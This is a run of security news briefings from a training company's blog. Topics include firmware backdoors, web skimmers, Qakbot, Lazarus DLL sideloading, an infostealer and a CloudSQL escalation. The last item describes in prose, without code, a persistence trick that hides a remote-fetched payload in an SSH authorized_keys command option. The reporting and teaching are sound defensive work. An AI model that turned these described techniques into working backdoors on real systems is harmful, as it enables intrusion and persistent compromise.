Les Bell and Associates Pty Ltd
Blog entries about Les Bell and Associates Pty Ltd
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Gigabyte UEFI BIOS Fix Release
Last Friday, we brought you news of a vulnerability in the UEFI BIOS of Gigabyte motherboards which could allow attackers to inject a UEFI bootloader via a MitM attack. The good news is that Gigabyte has now released an updated BIOS which has implemented stricter security checks during the boot process, specifically:
- Signature verification - files downloaded from remote servers are now validated by checking their signatures, and
- Privilege Access Limitations - stronger verification of remote server certificates
Security-conscious users might wish that Gigabyte had removed this automatic downloading feature completely - but then, not everyone is as conscientious about patching their systems, so that an automatic process is perhaps necessary in some environments.
Uncredited, Gigabyte Fortifies System Security with Latest BIOS Updates and Enhanced Verification, press release, 1 June 2023. Available online at https://www.gigabyte.com/Press/News/2091.
KeePass Vulnerability Fixed
Another good news story: the keepers of the KeePass project - a password safe program favoured by a number of security pros in our circle - have released KeePass version 2.54, which fixes an in-memory master password exposure problem we reported on back in mid-May.
The new release also features some user interface and integration enhancements. There are some issues that previous users may need to pay attention to, involving triggers, global URL overrides and password generator profiles, which are now saved to the enforced configuration file - users who had not previously saved these to that file will find that they have been disabled until reconfigure their individual settings
Uncredited, KeePass 2.54 released, news release, 3 June 2023. Available online at https://keepass.info/news/n230603_2.54.html.
Merchant Servers Abused by Skimmer Campaign
Researchers at Akamai have discovered and analysed a new Magecart-style web skimmer campaign which steals PII and credit card information from a variety of e-commerce web sites running the popular Magento, WooCommerce WordPress and Shopify platforms across North America, Latin America and Europe. Some of the sites are estimated to handle hundreds of thousands of visitors per month, and these customers' information and credit card details could end up on the dark web.
The attack involves two sets of servers:
- host victims - legitimate web sites which are hijacked in order to host the malicious JavaScript code which will be delivered to the victims; being legitimate businesses, these sites are less likely to arouse suspicion. Some of the host victims are themselves e-commerce sites which were compromised by the skimmer attack and then abused a second time to spread the attack malware.
- web skimming victims - the vulnerable merchant servers which are targeted by the skimming attack. Rather than injecting the attack code directly into these sites, the attackers employ small JavaScript snippets to fetch their malware from the host victim sites, thereby concealing the malicious activity.
The injected snippets are intentionally designed to resemble popular third-party campaign tracking services such as Google Tag Manager and Facebook Pixel, and the URL's of the host vicim web sites are further obfuscated by encoding them with base64 encoding.
The Akamai report suggests various mitigations, such as implementing a web application firewall.
Lvovsky, Roman, New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others, blog post, 1 June 2023. Available online at https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Qakbot Annual Evolution Continues
The operators of the Qakbot banking trojan - also known as Qbot and Pinkslipbot - have a pattern of taking the northern summer months off to, presumably, take some time off and also to refresh their tactics and the malware code. Researchers from Lumen's Black Lotus Labs have reported on the latest incarnation of Qakbot, which has evolved new initial infection and C2 techniques.
Daily active Qakbot bots, January - May 2023, with infection techniques (image credit: Lumen Black Lotus Labs)
During 2022, Qakbot had been relying on MS Office-based macro exploitation for initial infection, but after Microsoft disabled macros by default for Office users, they quickly switched between a variety of techniques: malicious OneNote files, HTML smuggling techniques, Mark of the Web evasion and malicious PDF's.
The Qakbot C2 infrastructure also evolved into a two-tier structure, with the first tier largely existing in residential dynamically-allocated consumer IP address space. These machines are frequently rebooted and their anti-malware tools frequently automatically updated, making it hard for the threat actor to persist in them, but Qakbot keeps its numbers up by retooling the machines it infects as C2's. Telemetry shows that a Qakbot victim machine is rapidly pillaged for data - after one week, it has sent 90% of all the data it will ever send to a C2, after which the operators will then use the victim for other purposes, including becoming a C2 or a proxy in their own infrastructure. The rapid turnover and changing IP addresses also enables Qakbot to elude tools which work on IP addresses as IOC's.
The second tier of C2 infrastructure is hosted on VPS machines, typically in data centers beyond the reach of all but Russian law enforcement.
Formosa, Chris, Steve Rudd and Ryan English, Qakbot: retool, reinfect, recycle, blog post, 1 June 2023. Available online at https://blog.lumen.com/qakbot-retool-reinfect-recycle/.
Google Triples Chrome Exploit Bug Bounty
Google has announced a higher maximum bug bounty in their Chrome Vulnerability Rewards Program. Until 1 December 2023, the first vulnerability report providing a functional full chain exploit resulting in a Chrome sandbox escape will be eligible for triple the full reward amount - that is, a reward of up to $US180,000 (and possibly more, with other bonuses).
Subsequent full chain reports submitted during this period will be eligible for double the full reward amount.
Bug reports may be submitted in advance while development of the functional exploit continues, but the functional exploit must be submitted by 1 December; only the first functional full chain exploit received is eligible for the triple reward amount. The exploit must result in Chrome browser sandbox escape, with a demonstration of attacker remote control or remote code execution outside the sandbox, with no or very little reliance on user interaction.
Ressler, Amy, Announcing the Chrome Browser Full Chain Exploit Bonus, blog post, 1 June 2023. Available online at https://security.googleblog.com/2023/06/announcing-chrome-browser-full-chain.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Back Door in Gigabyte Motherboards
Users of Gigabyte motherboards should urgently take note of a new vulnerability disclosed by Eclypsium researchers. The vulnerability, in the UEFI BIOS firmware of mtherboards from manufacturer Gigabyte, actually writes a Windows executable, GigabyteUpdateService.exe, to disk as part of the system boot process and sets registry entries to run it as a Windows service.
This process gets run by the Windows Session Manager Subsystem (smss.exe) when Windows starts, and in turn, it downloads and runs an executable payload from one of several Gigabyte servers. Most worryingly, the latter process is highly insecure, allowing a download over plain, unprotected HTTP - with no TLS - and also not performing any signature verification on the downloaded executables.
These two steps are both highly concerning; the first is very similar to the techniques used by other UEFI boot hacks like LoJack DoubleAgent and firmware implants such as Sednit LoJax, while the second is vulnerable to MitM attacks and other exploits. And now that this vulnerability has been disclosed, we can expect 0days to follow in short order. Gigabyte should really know better: their motherboards have previously been exploited by a Chinese-originated bootkit.
Affected users should check their UEFI BIOS setup and disable the "App Center Download & Install" feature and set a BIOS password to prevent malicious changes. They should also update their systems to the latest version firmware and software. Eclypsium's report also provides a list of URL's which can be blocked at the firewall, as well as a long - 3 pages! - list of affected motherboards.
Eclypsium, Supply Chain Risk from Gigabyte App Center Backdoor, blog post, 31 May 2023. Available online at https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/.
When Down-to-Earth Approaches to Security Aren't the Answer
Finally, a little light reading for your weekend - a cybersecurity issue that affects relatively few of us and perhaps as a result has escaped attention until now. In a recent paper presented at the spring 2023 IEEE Aerospace Conference, Johns Hopkins professor Gregory Falco drew attention to a blindingly obvious - with the benefit of hindsight - problem: the RFP for the development of the next-generation space suits to be used in the upcoming Artemis missions had no requirements for assurance of cybersecurity.
In fact, security is often overlooked in the development of space hardware, firmware and software. Back in the days of the Mercury, Gemini and Apollo missions, development benefited from security by obscurity, since the systems were so specialized. However, since then, we have seen the entry of private operators who inevitably seek cost-effectiveness through the use of commercial-off-the-shelf (COTS) hardware and software. Furthermore, we have transitioned through the development of the Internet to an era of ubiquitous, always-connected, computing and now to commercial space tourism which could see personally-owned devices connected to spacecraft networks and systems.
An article in IEEE Spectrum canvases these issues and suggests some approaches to solutions.
Wells, Sarah, Cybersecurity Gaps Could Put Astronauts at Grave Risk: Houston, we may have a malware problem, IEEE Spectrum., 1 June 2023. Available online at https://spectrum.ieee.org/cybersecurity-in-space.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
CISA Vulnerability Summary for the Week of 22 May 2023
The US Cybersecurity & Infrastructure Security Agency has released a vulnerability summary listing vulns which were added to NIST's National Vulnerability Database (NVD) during the week commencing 22 May 2023. Just skimming the bulletin provides a sobering reminder of the struggle we face in securing our systems: the list of "High" severity vulns (those with a CVSS base score of 7.0 to 10.0) contains 115 entries in a huge array of software - everything from low-level drivers to applications for managing restaurant reservations and old age homes (including three applications I use myself!).
Uncredited, Vulnerability Summary for the Week of May 22, 2023, bulletin, 30 May 2023. Available online at https://www.cisa.gov/news-events/bulletins/sb23-150.
Latest Kali Linux Arrives
It's surprising to realise that everybody's favourite pen-testing platform, Kali Linux, has now been with us for ten years. Kali provides a broad range of pen-testing tools in a single package which can be downloaded either as an installer image for a dedicated hardware platform, or as a virtual machine image which, although it does not provide full access to the underlying hardware, makes an excellent platform for experimentation and education.
The 2023.2 release of Kali offers a number of updates:
- New VM image for Microsoft Hyper-V - With “Enhanced Session Mode” (xRDP over HvSocket) out of the box
- Xfce audio stack update: PulseAudio replaced by PipeWire - Better audio for Kali’s default desktop
- i3 desktop overhaul - i3-gaps merged with i3 tiling window manager
- Desktop updates - Easy file hash calculation in Xfce File Manager
- GNOME 44 - Gnome Shell version bump
- Icons & menus updates - New apps and icons in menu
These are all nice, but most users will be more interested in the new tools added to the network repositories for this release:
- Cilium-cli - Install, manage & troubleshoot Kubernetes clusters
- Cosign - Container Signing
- Eksctl - Official CLI for Amazon EKS
- Evilginx - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
- GoPhish - Open-Source Phishing Toolkit
- Humble - A fast security-oriented HTTP headers analyzer
- Slim(toolkit) - Don’t change anything in your container image and minify it
- Syft - Generating a Software Bill of Materials from container images and filesystems
- Terraform - Safely and predictably create, change, and improve infrastructure
- Tetragon - eBPF-based Security Observability and Runtime Enforcement
- TheHive - A Scalable, Open Source and Free Security Incident Response Platform
- Trivy - Find vulnerabilities, misconfigurations, secrets, SBOM in containers, Kubernetes, code repositories, clouds and more
- Wsgidav - Generic and extendable WebDAV server based on WSGI
You can download Kali Linux release 2023.2 at https://www.kali.org/get-kali/.
Uncredited, Kali Linux 2023.2 Release (Hyper-V & PipeWire), blog post, 30 May 2023. Available at https://www.kali.org/blog/kali-linux-2023-2-release/.
Amazon Fined Over $US30 Million For Privacy Breaches
Amazon has been fined a total of over $US 30 million by the US Federal Trade Commission for two separate privacy violations.
In the first, Amazon settled for $US5.8 million over spying on female customers by a former employee, using Ring cameras placed in bedrooms and bathrooms. The company also agreed to pay $US25 million to settle alegations it violated the privacy rights of children when it failed to delete Alexa recordings at the request of parents, keeping them for longer than necessary. Amazon disagrees with the FTC's claims, but settled regardless.
The FTC is also probing Amazon's $US1.7 billion acquisition of iRobot Corp., which would give the online retail giant even more visibility into its customers' homes.
Bartz, Diane, Amazon's Ring used to spy on customers, FTC says in privacy settlement, Reuters, 31 May 2023. Available online at https://www.reuters.com/legal/us-ftc-sues-amazoncoms-ring-2023-05-31/.
Lawyers Beware: ChatGPT Hallucinates About Cases
A New York lawer and his colleagues are learning the hard way about the dangers of trusting your work to artificial intelligence, being ordered to show cause why they should not be sanctioned in the US District Court for the Southern District of New York for citing non-existent cases.
Steven Schwartz of the firm Levidow, Levidow, & Oberman had been acting for a plaintiff in a case filed against airline Avianca in a New York state court. When Avianca got the case moved to the federal court, Schwartz had a problem - he was not admitted to practice in that court - so his firm decided to have his colleague, Peter LoDuca, file the documents while Schwartz did the legwork behind the scenes.
Only, Schwarz didn't do the work himself, using ChatGPT to "supplement" his research. Unfortunately, the document he filed in opposition to a motion to dismiss was "replete with citations to non-existent cases", according to Federal Judge Kevin Castel, who apparently does do his own homework. "Six of the submitted cases appear to be bogus judicial decisions with bogus quotes and bogus internal citations."
Not only do the filings contain names of fictitious cases but also excerpts from the fictional decisions, citing precedents that do not exist. Schwartz counters, with a ChatGPT conversation transcript as evidence, that he asked the AI chatbot whether a case was real and was assured that it is, and "can be found on legal research databases such as Westlaw and LexisNexis", as could the other cases.
Schwartz and LoDuca will appear before the judge on 8 June to show cause why they and their firm should not be sanctioned. The obvious moral of the story is . . . obvious.
Brodkin, Jon, Lawyer cited 6 fake cases made up by ChatGPT; judge calls it “unprecedented”, Ars Technica, 31 May 2023. Available online at https://arstechnica.com/tech-policy/2023/05/lawyer-cited-6-fake-cases-made-up-by-chatgpt-judge-calls-it-unprecedented/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
From the "Who Ever Thought This Was a Good Idea?" File
Back in 2014, ICANN (the Internet Corporation for Assigned Names and Numbers) made a whole range of TLD's (top-level domains) available - mostly for the benefit of domain registrars who run a protection racket advising companies to register in them ("Nice .com domain name you've got here, squire. Be a shame if someone else registered a similar one, narrmean? [sniff]". Sensibly, most companies have not fallen for the bait, but some registered generic TLD's in which they can sell subdomains. Among these was Google, which - after a long delay - is now offering registrations in such TLD's as .dad, .phd, .mov and .zip.
Now, I'm sure you can see the problem with this. Given the convergence of desktop shells and browsers, with URL's such as file:/// being treated in exactly the same way as https://, how do you know if you are looking at a link to a ZIP file, or to a server in the .zip domain? In fact, the Windows File Explorer search bar will open a .zip domain site if it cannot find the corresponding file on the user's machine. Expect the phishing threat actors to develop even more ingenious deceptions, too.
And sure enough, mr.d0x has provided a couple of interesting proof-of-concept examples. Using only straightforward HTML, CSS, JavaScript and some .png and .webp graphics, he has produced convincing emulations of both the WinRAR file archiving utility and the Windows 11 File Explorer window, along with two use cases: credential harvesting and downloading an executable in place of a document file.
mr.d0x, File Archiver In The Browser, blog post, 22 May 2023. Available online at https://mrd0x.com/file-archiver-in-the-browser/.
Blackberry Threat Intelligence Report
Blackberry might not be a major player in the cellphone market these days, but its Cylance acquisition - now rebadged as Blacberry Cybersecurity - makes it a significant player in the enterprise endpoint detection and response market. The telemetry from this suite of products is used to compile Blackberry's quarterly Global Threat Intelligence Report. The latest edition, covering December 2022 to February 2023, was released recently, and - as with many such reports - makes for interesting reading.
Among the high points:
- Although the US accounted for 65% of attacks detected, Brazil has risen to second place, with 10% of detected attacks. Australia is in sixth place, and Singapore entered the top ten for the first time.
- The most-targeted industries were finance, followed by healthcare and FMCG (fast-moving consumer goods) retailers, collectively accounting for 60% of all malware-based attacks.
- The most frequently-used techniques were droppers, downloaders, remote access trojans and ransomware.
Bestuzhev, Dmitry, et. al., Global Threat Intelligence Report, technical report, April 2023. Available online at https://www.blackberry.com/us/en/solutions/threat-intelligence/2023/threat-intelligence-report-april.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Lazarus Group Targets IIS Via DLL Sideloading Attack
Researchers at South Korean security firm AhnLab has reported on a campaign being run by North Korean state-sponsored APT the Lazarus Group. The specific attack targets servers running a vulnerable version of Microsoft's Internet Information Server, achieving initial access via a DLL sideloading technique.
In this attack, the threat actor uses the IIS web server process, w3wp.exe, to place a malicious DLL named msvcr100.dll into the same directory as a normal application executable, Wordconv.exe. When they run Wordconv.exe, this loads and executes the malicious DLL, exploiting the well known DLL search path vulnerability in Windows: rather than only loading DLL's from the system library path, Windows will search the current working directory first and load the malicious DLL instead of the legitimate one.
msvcr100.dll is very similar to an earlier Lazarus Group DLL, cylvc.dll - it decrypts a data file called msvcr100.dat in order to create an executable file in memory, which it then runs, using yet another DLL called diagn.dll to decrypt and run another executable. This process resisted forensic analysis, but since it accesses the memory of the lsass.exe process, it is most likely a credential stealer. Once credentials have been acquired, the threat actor then performs network reconnaisance and pivots to other hosts, using the RDP protocol.
The AhnLabs report includes some analysis and IOC's.
muhan, Lazarus Group Targeting Windows IIS Web Servers, technical report, 23 May 2023. Available online at https://asec.ahnlab.com/en/53132/.
Breached? At Least Think About Changing Passwords
An alarming statistic gleaned from a survey of cybersecurity breaches released by the UK Department for Science, Innovation & Technology last month reveals that only 6% of businesses and 4% of charities updated passwords after their most disruptive breach or attack of the previous 12 months. This is an astonishingly low figure, even allowing for the fact it was based on the 32% of business and 24% of charity survey respondents that had identified a breach, rather than the full sample of respondents. It also leads one to wonder: the survey question asked about only "the most disruptive breach or attack" - how many of the respondents had suffered multiple breaches? Probably more than a few, if their lax password practices are any indication.
Percentage of organisations that say they take, or would take, the following actions following a cyber security incident (UK Government)
Some of the other statistics are quite alarming - for example, only 57% of businesses and 60% of charities would inform a regulator, and only slightly more would formally debrief to log any lessons learned.
Around one-third of businesses and a quarter of charities reported having experienced some kind of cybersecurity breach or attack in the previous 12 months, with larger businesses and high-income charities being more likely to identify breaches or attacks than small ones.
The report makes fascinating, albeit somewhat scary, reading.
Johns, Emma, et. al., Cyber security breaches survey 2023, UK Department for Science, Innovation & Technology, 19 April 2023. Available online https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2023/cyber-security-breaches-survey-2023.
Stealthy Infostealer Targets Browsers, Crypto Wallets
From Trend Micro comes a report of a new infostealer called Bandit Stealer which is being promoted within the malware community. Bandit Stealer is written in the Go programming language, perhaps with cross-platform compatibility in mind, and makes use of sandbox detection techniques in order to evade detection and analysis by anti-malware products.
The malware attempts to achieve privilege elevation by using the runas.exe utility (a rough equivalent to *ix's sudo command). However, it fails - primarily due to the fact that to run as Administrator it will have to provide a password.
It also checks to see if it running in a container, sandbox, jail or any of several virtualization environments such as KVM, VirtualBox, VMware or Xen. However, while doing this, it also attempts to read /proc/self/status - a directory that only exists on Linux machines, indicating the intention of developing a cross-platform variant. It further downloads a text file containing hardware ID's, IP addresses, MAC addresses, usernames, hostnames and process names that might also indicate that is being run in a sandbox or test environment, and if it sees any of the blacklisted processes, it will attempt to terminate them. Again, the use of Linux-specific commands like pgrep and pkill indicate cross-platform intent.
Bandit Stealer goes on to create an autorun registry entry in order to persist through reboots, and then sets about collecting information, storing it in a vicinfo folder in the user's AppData\Local\ directory. It collects user and host information, Telegram sessions, login data, cookies, web history and credit card details from any of many different browsers, as well pilfering cryptocurrency wallets.
Initial infection seems to be through a drive-by or phishing malmails which carry a dropper.
The Trend Micro report provides a more detailed analysis and IOC's.
Camling, Sarah Pearl and Paul John Bardon, New Info Stealer Bandit Stealer Targets Browsers, Wallets, research report, 26 May 2023. Available online at https://www.trendmicro.com/en_us/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Crisis Communications Vital When Handling Privacy Breaches
Two stories over the weekend demonstrate the importance of having a good crisis communications plan in place before a privacy breach occurs. In fact, the two cases - which involve government agencies - could almost be case studies in how not to respond to a privacy breach.
In the first case, NT Health, the health department of the Northern Territory (Australia), apparently mismanaged the transfer of patient health records as part of a software upgrade. Over 50,000 patients had their records transferred between two government departments in 2018 and 2019, but more than 3,000 identifiable records - some classed as very-high or high clinical risk, such as psychological reports, psychiatric facility visits, pregnancy terminations and stillbirth records and ECT records - were subsequently transferred to global software vendor Intersystems.
Then-health minister - now Territory Chief Minister - Natasha Fyles never made the privacy breach public. Instead, the breach was managed "in-house" and patients were never notified. There appears to be some disagreement between the Information Commissioner, Peter Shoyer, who claims his department provided only "brief advice ... on potential further steps" and NT Health Chief Executive Marco Briceno, who said his department "consulted extensively at the time with the information commissioner".
In the second case, Fire Rescue Victoria (FRV) was attacked in December of last year and its emergency dispatch system taken offline (and remains offline at time of writing, in late May!). However, in early March, applicants for firefighter positions received a letter disclosing that "FRV has reasonable grounds to believe that the personal information of firefighter recruit applicants may have been accessed or stolen by a malicious third party". The letter stated that the data had been shared on the dark web but offered no further details.
In fact, not only was identification and contact information compromised as part of a ransomware attack, but also medical records, passport and driver's licence details, Medicare numbers, Centrelink numbers, healthcare identifiers and potentially health information and superannuation details.
By not providing the affected people with full details of the personal information that had been compromised, FRV denied them the opportunity to take steps to protect themselves against further loss, such as obtaining new driver's licences and other identifiers. It is not clear how many individuals are affected, but they certainly number in the thousands - potentially every applicant for firefighter recruitment, and there are more than 5,000 applications each year.
Whether the agencies' handling of these incidents complies with the requirements of the Privacy Act 1988 (Cth) and, specifically, the Notifiable Breaches scheme is a matter for the Information Commissioner, but both involve personal health information and would seem to fall within the definition of a serious data breach. In any case, a reasonable person would expect to be notified when their personal information - especially health records - are compromised, so there is an argument that notification is simply a matter of applying due care.
Both cases, however, highlight the need for a well-considered data breach policy and incident response plan which covers crisis communcations and reputation repair. Failure to notify individuals seriously reduces public trust and confidence in the breached organizations - especially when a perceived cover-up makes the headlines. There is some evidence that full disclosure and transparency leads affected individuals to correctly attribute blame to cybercriminals and side - to a limited extent - with the affected organization, especially if it provides them with assistance and contacts to limit the damage.
Hislop, Jack, NT information commissioner seeks to distance himself from privacy breach of public health files, ABC News, 27 May 2023. Available online at https://www.abc.net.au/news/2023-05-27/nt-information-commissioner-privacy-breach-public-health-files/102397744.
Rizmal, Zalika, Fire Rescue Victoria's cyber-hack response a 'lesson in how not to communicate', ABC News, 27 May 2023. Available online at https://www.abc.net.au/news/2023-05-27/fire-rescue-victoria-data-hack-privacy/102400672.
Benoit, William L. “Image Repair Discourse and Crisis Communication.” Public Relations Review 23, no. 2 (June 1, 1997): 177–86.
Rikki Don't Lose That Phone
We all know that improper media sanitization before disposal leads to second-hand devices being sold with data intact and recoverable by the new owners. And, of course, if your device is stolen, there goes the opportunity to delete data and do a factory reset - so that devices bought from pawn shops and online trading sites have an even higher proportion of personal data on them.
But if you really want to cheaply acquire a lot of sensitive information, here's a source you may not have thought of: buying cellphones which are auctioned off by US police departments. It makes sense: phones which police have seized will often contain evidence of criminal activity - and in some cases, the police may have helpfully used forensic tools to provide privileged levels of access to information which would normally be protected, passing this information on to the new owner. If you're a drug dealer looking for new customers, your local police department could be a useful source of contacts!
Richard Roberts and his colleagues at the University of Maryland bought 228 police-auctioned cellphones at an average price of just $US18.00. Of these, 49 were completely unlocked and another used easily-guessable passcodes. In one case, police had used GrayKey mobile device forensics software to break into the phone, and had noted the passcode.
Several phones had stored credit card details - some legitimate and some stolen. The researchers also found scans of 5 passports and 14 driver's licences, as well as a few scans of government-issued identity credentials and some communication between sex workers and clients. As one might expect, there were also personal text messages, not to mention nude photographs.
With one phone, the researchers struck the motherlode: 24 credit reports, along with the related identity, bank account details, social security numbers and employment records - probably the work materials of an identity fraudster.
The fact that police forces do not destroy these devices or at least sanitize them is surprising, to say the least. It also highlights the importance of securing portable devices as well as the use of mobile device management software to remotely delete sensitive data when the device is lost or stolen - although subsequent use of forensic tools may defeat even that.
Roberts, Richard, Julio Poveda, Raley Roberts and Dave Levin, Blue Is the New Black (Market): Privacy Leaks and
Re-Victimization from Police-Auctioned Cellphones, preprint, IEEE Security & Privacy 2023. Available online at http://richard.technology/research/publications/ieeesp23_auctions.pdf.
Researchers Close Google CloudSQL Hole
Cloud applications often require a separate persistent data store, and so the cloud service providers typically offer both a NoSQL cloud-native database and a choice of the more popular SQL relational database engines, such as MySQL and Microsoft SQL Server. One problem service providers face is adapting and especially securing these databases for the cloud environment - they were originally developed for stand-alone operating system platforms. In the case of the open-source products like MySQL and PostgreSQL, the availability of the source code helps, but SQL Server is proprietary, and so cloud security needs to be added 'on top' rather than tightly integrated.
Understanding this led researchers at Dig Security to discover a rather nasty vulnerability in Google's CloudSQL implementation of SQL Server. The vulnerability allowed privilege escalation from basic CloudSQL user to becoming a full-fledged administrator on the SQL Server container. This was achieved in two steps: first, escalating from CustomerDbRootRole to DbRootRole, which is a Google Cloud Platform admin role, followed by exploitation of a misconfiguration which allowed a further escalation to the Sysadmin role.
This would grant full access to all data in the SQL server, as well as full access to the underlying operating system - not to mention access to service agents and some URL's which could allow pivoting to other environments.
Fortunately, the researchers collaborated with Google to resolve the underlying issues, presumably earning a nice bug bounty in the process.
Balassiano, Ofir and Ofir Shaty, GCP CloudSQL Vulnerability Leads to Internal Container Access and Data Exposure, blog post, 24 May 2023. Available online at https://www.dig.security/post/gcp-cloudsql-vulnerability-leads-to-internal-container-access-and-data-exposure.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
With an eye to the approaching weekend, some lighter reading in today's news brief:
Botnet Madness for Teens
From Scott J. Shapiro's new book, "Fancy Bear Goes Phishing", by way of IEEE Spectrum magazine, comes the fascinating tale of how an arms race between two sparring groups of teenagers, combined with an informal protection racket against Rutgers University, led to the creation of the Mirai botnet.
Shapiro, Scott J., The Strange Story of the Teens Behind the Mirai Botnet, IEEE Spectrum, 23 May 2023. Available online at https://spectrum.ieee.org/mirai-botnet.
Defending Against XPath Injection
One of the short topics I cover during our CISSP courses is the variety of injection attacks, with examples of both SQL injection and XML injection; there isn't time to go into the other types such as LDAP injection and command injection. One that I don't mention at all is XPath injection.
Trend Micro comes to the rescue here, with a nice, short but reasonably comprehensive tutorial on the topic. XPath - the XML Path Language - is used to query XML databases and it can be used by attackers in a manner similar to the more common SQL injection, retrieving information from the XML Document Object Model. In particular, with repeated queries, an attacker can 'crawl' the DOM, gradually recreating the entire XML document.
The Trend Micro tutorial walks the user through creating a simple Node.js application which queries an XML database, and then demonstrates some XPath injections. It then concludes with the defensive techniques, which are in some ways analogous to the SQL injection defenses: input sanitization, using parameterized XPath queries and using precompiled XPath queries.
Trend Micro DevOps Resource Center, Understanding XPath Injection Vulnerabilities, web page, 25 May 2023. Available online at https://www.trendmicro.com/en_us/devops/23/e/xpath-injection-vulnerabilities.html.
Exploiting SSH Public Keys for Fun and Profit
Finally, from The Hacker's Choice comes an interesting technique which exploits a little-known feature of OpenSSH in order to create a persistent backdoor on compromised systems.
OpenSSH public keys can be prefixed by various options - I bet you didn't know that, despite having read the Snail book, right? - and one of these options allows execution of a command. In the article, the author executes PowerShell to evaluate some commands, which are obscured by their conversion into a long hexdump string; the string is piped into the xxd hex dump utility to convert them back to text before evaluation.
The backdoor in this example is an installer, fetched from thc.org and then executed in memory before the user's normal shell is started.
It's a neat trick; SSH public keys are long base64-encoded strings anyway, and so at a casual glance, a long hex string will not draw attention. Generally, we can rely on a simple defence - the permission bits on ~/.ssh and the authorized_keys file within it, which will stop any other users having access to them, let alone editing a key:
drwx------. 2 username username 48 Feb 26 14:11 .
-rw-------. 1 username username 102 Jun 11 2022 authorized_keys
However, cloud instances often have keys loaded into them at boot time, and if an attacker was able to edit a root account or service key in, for example, a cloud management console . . .
Something to think about over the weekend.
root, Infecting SSH Public Keys with backdoors, blog post, 24 May 2023. Available online at https://blog.thc.org/infecting-ssh-public-keys-with-backdoors.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
